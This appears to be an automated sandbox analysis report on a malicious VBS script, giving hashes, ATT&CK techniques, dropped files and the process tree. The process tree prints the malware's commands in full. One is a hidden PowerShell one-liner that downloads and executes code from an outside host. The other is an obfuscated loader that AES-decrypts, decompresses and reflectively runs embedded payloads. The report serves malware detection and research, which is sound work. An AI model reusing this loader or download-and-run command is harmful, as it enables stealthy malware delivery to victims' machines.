799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be

General

Target

799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be.vbs
Size

78KB
MD5

f4360392014f0bebc78d81bbf8b1bfec
SHA1

275ddf9b03cc98e1f0d599140e19c64d5a941fd9
SHA256

799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be
SHA512

bfeded4bf8bd4e82226ec0b3b3abb7dfd9d328ce1216004bdd47bf997f3058a8cf8a5973ef4e01979dbfdb71cc2c9f73a731f70e58eec2106208d7dc08000a79
SSDEEP

1536:xO6AlDEJYMg1Z0BYBOMadTFA63RI3xMpFgLTljdKCHBlok:kblQJYZ1Z2YBLT2mSpFg6iEk

Score

8^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2552	powershell.exe
824	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2552	powershell.exe
824	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2552	powershell.exe
Token: SeDebugPrivilege	824	powershell.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2792 wrote to memory of 2552	2792	WScript.exe	30
PID 2792 wrote to memory of 2552	2792	WScript.exe	30
PID 2792 wrote to memory of 2552	2792	WScript.exe	30
PID 2792 wrote to memory of 2420	2792	WScript.exe	32
PID 2792 wrote to memory of 2420	2792	WScript.exe	32
PID 2792 wrote to memory of 2420	2792	WScript.exe	32
PID 2420 wrote to memory of 888	2420	cmd.exe	34
PID 2420 wrote to memory of 888	2420	cmd.exe	34
PID 2420 wrote to memory of 888	2420	cmd.exe	34
PID 2420 wrote to memory of 824	2420	cmd.exe	35
PID 2420 wrote to memory of 824	2420	cmd.exe	35
PID 2420 wrote to memory of 824	2420	cmd.exe	35

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\799e3743d0666a4d0def179260537e1711456f39949cc672ba356d15bca9c0be.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2792
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/vbs.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2552
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\system.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7YiAJ5/sPelca+hTcek78jxnU9ioiOBmM7qe4UB010A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('K5VNkdetZe//Td3nkfB/hw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $zGnmY=New-Object System.IO.MemoryStream(,$param_var); $gcYTH=New-Object System.IO.MemoryStream; $twAan=New-Object System.IO.Compression.GZipStream($zGnmY, [IO.Compression.CompressionMode]::Decompress); $twAan.CopyTo($gcYTH); $twAan.Dispose(); $zGnmY.Dispose(); $gcYTH.Dispose(); $gcYTH.ToArray();}function execute_function($param_var,$param2_var){ $nREcc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hmWZi=$nREcc.EntryPoint; $hmWZi.Invoke($null, $param2_var);}$BBtPh = 'C:\Users\Admin\AppData\Local\Temp\system.bat';$host.UI.RawUI.WindowTitle = $BBtPh;$VJQrS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BBtPh).Split([Environment]::NewLine);foreach ($EvXNX in $VJQrS) { if ($EvXNX.StartsWith('jVPqiiWHWVTrLedMZeIO')) { $Qjyhd=$EvXNX.Substring(20); break; }}$payloads_var=[string[]]$Qjyhd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:888
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\system.bat

Filesize
69KB

MD5
67fdaf4f143ad3cdab6f3c542076b194

SHA1
8a7474470f2c47e3f301aef70da5ef415c38cff2

SHA256
f10e4792e78f14998d0334d5d35b5efa825581c917a80e6d8ee096ee714e0c7e

SHA512
64d68d7e8dbad526a2d4d09f4a3ba8b2a28a97a79123ad303c3aea39be8652fc2ad9fdc3f85ddbf68c0713e6186b8219774cd6c46cf90ac3f6a61711b62939e4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d1420fcf302d08471a696d1209e96de9

SHA1
83676d51e4f823467737943b803d76763c64a274

SHA256
f6897d7f9c25344aead9aade34a64c3d15b701c1e4cd7e3a9aedc4100fb70df3

SHA512
7a15e646868bb1dd762180a4ee5bac6d00e379c8e954a5a780fceb55cd8dc8fdc111967510f9d080b9e6360c250f09f4b1faa3156c729c17170b28a1fc08d5ee

Download Submit
memory/824-26-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/824-27-0x0000000002820000-0x0000000002828000-memory.dmp

Filesize
32KB

Download
memory/2552-4-0x000007FEF601E000-0x000007FEF601F000-memory.dmp

Filesize
4KB

Download
memory/2552-6-0x0000000001DB0000-0x0000000001DB8000-memory.dmp

Filesize
32KB

Download
memory/2552-5-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/2552-7-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-10-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-11-0x000007FEF5D60000-0x000007FEF66FD000-memory.dmp

Filesize
9.6MB

Download
memory/2552-9-0x000000000296B000-0x00000000029D2000-memory.dmp

Filesize
412KB

Download
memory/2552-8-0x0000000002964000-0x0000000002967000-memory.dmp

Filesize
12KB

Download

Analysis

Sharing